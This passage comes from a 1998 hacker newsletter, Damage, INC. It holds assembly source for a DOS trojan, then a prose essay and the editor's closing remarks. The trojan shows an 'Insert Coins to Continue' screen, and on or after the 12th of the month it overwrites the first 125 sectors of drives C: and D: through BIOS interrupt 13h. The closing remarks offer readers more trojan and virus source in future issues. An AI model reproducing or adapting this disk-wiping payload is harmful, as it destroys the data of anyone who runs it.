'Û',1,'Û',1,'Û',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Û',1,'Û',1 DB 'Û',1,'ß',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Ü',1 DB 'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'ß',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'ß',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'þ',8,' ',8,'I',8,'n',8,'s',8,'e',8,'r',8 DB 't',8,' ',8,'C',8,'o',8,'i',8,'n',8,'s',8,' ',8,'t',8 DB 'o',8,' ',8,'C',8,'o',8,'n',8,'t',8,'i',8,'n',8,'u',8 DB 'e',8,' ',8,'þ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8 .CODE ;The actual code starts below. start: mov ah,2ah ;Get current Date int 21h ;DOS Call cmp dl,12 ;Check current Day jb damstart ;Jump if Below 12th of the month. nuke: cli ;Clear (disable) interrupts mov ah,3 ;BIOS Write Sectors mov al,125 ;Number of sectors to nuke. mov ch,0 ;Cylinder number mov cl,1 ;Starting sector mov dh,0 ;Head number mov dl,80h ;Drive C: mov bx,offset damage ;Pointer to data buffer int 13h ;Call Interrupt 13 mov ah,3 ;BIOS Write Sectors mov al,125 ;Number of sectors to nuke. mov ch,0 ;Cylinder number mov cl,1 ;Starting sector mov dh,0 ;Head number mov dl,81h ;Drive D: mov bx,offset damage ;Point to data buffer int 13h ;Call Interrupt 13 sti ;Enable interrupts beeper: mov cx,5 ;Number of beeps = 5 mov ax,0E07h ;BIOS display char., BEL beep_loop: int 10h ;Using int 10,0E loop beep_loop ;Beep until CX = 0 ;Set up DS, SS and SP Registers. damstart: mov dx,@data ;Move data into dx mov ds,dx ;Move dx into ds mov bx,ss ;Move ss into bx sub bx,dx ;Subtract dx from bx shl bx,1 ;Shift bx logical left by 1 shl bx,1 ;Shift again shl bx,1 ;and again. shl bx,1 ; and Laughing! Haha. cli ;Clear interrupts mov ss,dx ;Move dx into ss add sp,bx ;Add bx to sp and store in sp sti ;Enable interrupts push es ;Push ES register to save it mov ax,0B800h ;Color text video segment mov es,ax ;Move ax into es sub si,si ;Subtract SI from SI mov si,offset DAM_DATA ;Pointer to the Data (ansi screen) sub di,di ;Subtract DI from DI and you get DI. mov cx,DAM_LENGTH ;CX is size of the screen rep movsw ;Repeat move string word. Write to ;video memory. mov ah,02h ;Set cursor position mov bh,0 ;Video page 0 mov dx,1A00h ;Move cursor past bottom of screen int 10h ;Hides the cursor lup: mov ah,01h ;Get keyboard status int 16h ;Are any keys being pressed? jz lup ;Jump if zero. A simple loop. mov ah,0 ;Waits for keypress and reads the int 16h ;character using int 16,0 ;Clears the screen mov ah,7 ;Scroll down a window mov al,0 ;Blank entire screen mov bh,7 ;Attribute to use on blank line mov ch,0 ;Row of upper left corner = 0 mov cl,0 ;Column of upper left corner = 0 mov dh,25 ;Row of lower right = 25 mov dl,80 ;Column of lower right = 80 int 10h ;Clears entire 80x25 screen. mov ah,02h ;Sets cursor position mov bh,0 ;Video page 0 mov dx,0 ;Puts the cursor back at the top. int 10h ;Call Interrupt 10 pop es ;Restore ES register mov ax,@data ;Move the data into ax mov ds,ax ;Move ax into ds mov ah,9 ;Print string function mov dx,offset Message ;Pointer to the message int 21h ;Call DOS to execute mov ax,4c00h ;DOS exit function w/exitcode = 0 int 21h END start ;The end. ------------------------------------------------------------------------------- THOUGHTS, POEMS AND CREATIVE WRITING - {WRITING} "Visions in Fire" I live in the chaos and madness. I've learned to embrace my own insanity. The world now mutates around me like molten lava flowing in a river of fire. It cascades down the volcano and towards the ocean. Once it reaches those cool waters it is transformed back into solid rock. The process is amazing and visually stunning, but not nearly as important as the result, which is creation itself. Being able to view the abstract, unique shapes as they form underneath the surface of the waves, that are forever crashing into the jagged cliffs along the expansive shoreline is an experience that makes a lasting impression. However, living on the inside and looking out at everyone else is an even greater one. Imagine the sight of people around you behaving like ants in a colony. They exist, but they are trapped. The ants are controlled, mindless, insignificant workers that live to serve their queen and "society". Their world is a controlled one in which every little ant has their own tasks and duties to perform. The ants do communicate with each other. It's usually limited and mainly used for instructions that are work or food related. The level of interaction between them might seem highly advanced, but in reality it is just an elaborate illusion. The ants might seem like individual insects at times, yet they cannot survive by themselves outside of the colony. They completely rely on each other. It is not natural or normal for people to live in the same way as ants. Human beings shouldn't behave like insects. I was filled with hate. The hate was powerful and it nearly consumed me. Learning the cause of the hate was difficult. Accepting the reason for my hate was challenging. Denouncing and leaving the confines of "society" was actually easy. The change that it made was dramatic. Sometimes drastic changes are necessary for ones survival. Positive change can lift your spirit and take you into a new direction. The experiences gained from that can be rewarding and fulfilling. The most immediate consequence of a life- altering change is the expansion of your consciousness. You cannot make the change knowing what the results will be. It's like seeing visions in fire. The visions may give you insight into the future or they may be false and misleading images. They can be deep and profound or shallow and fake. You become enlightened when you realize that you aren't just another ant in the colony. Discover your purpose. Find the individualism that you lost. Don't be fooled by the messages that you are told to believe. Truth is concealed. Lies are blatant. If you search you can uncover the hidden meaning. Abandon the ants in the colony. Trust your own vision. Written by Blackie Lawless ú Damage, INC. (C)opyright 1998. CLOSING COMMENTS - {CLOSING} BLACKENED's Humble Closing Comments: Damage, INC. is committed to releasing quality issues of the Damage, INC. Newsletter in 1998. As you already know, it's a new year. We want to start off this year by doing unique, innovative, original and creative projects. The articles that were included in this January issue should demonstrate that to you, and reflect our main goal. That is, we always strive for excellence. In 1998, I want to spend more time programming and releasing Damage, INC. Utilities. There are a few unfinished projects that I'd like to complete. I also plan to work on Trixter! (the bbs software that I use with my board) now that I have the source code. ;) Other than those projects, I would like to "tutor" some h/p newbies... Plus, I'm going to reserve some time for myself so that I don't lag behind in the h/p scene. On another note, we have many interesting ideas and topics in mind for future issues of the Damage, INC. Newsletter. We're going to write more about the paranormal, millennium, drugs etc. and share our opinions. If you have any suggestions, contact us. For example, should we continue to include source code? If so, should it be commented source for utilities, trojans or viruses? What type of articles do you enjoy reading? What are the topics that interest or affect you the most? We're always looking for Writers, Members and Distribution Sites. If you'd like to apply to Damage, INC. and join a respected h/p group, then download a copy of the Damage, INC. Application Generator. If you want any of our releases, they are currently available on the following boards: ...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only. Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t. Distraught Continuum - h/p/a/c/v/t, programming, etc. Any feedback or letters to the editor should be sent to BLACKENED in Email on a Damage, INC. board near you. I can also be contacted via Echomail/Netmail in several nets. - EOF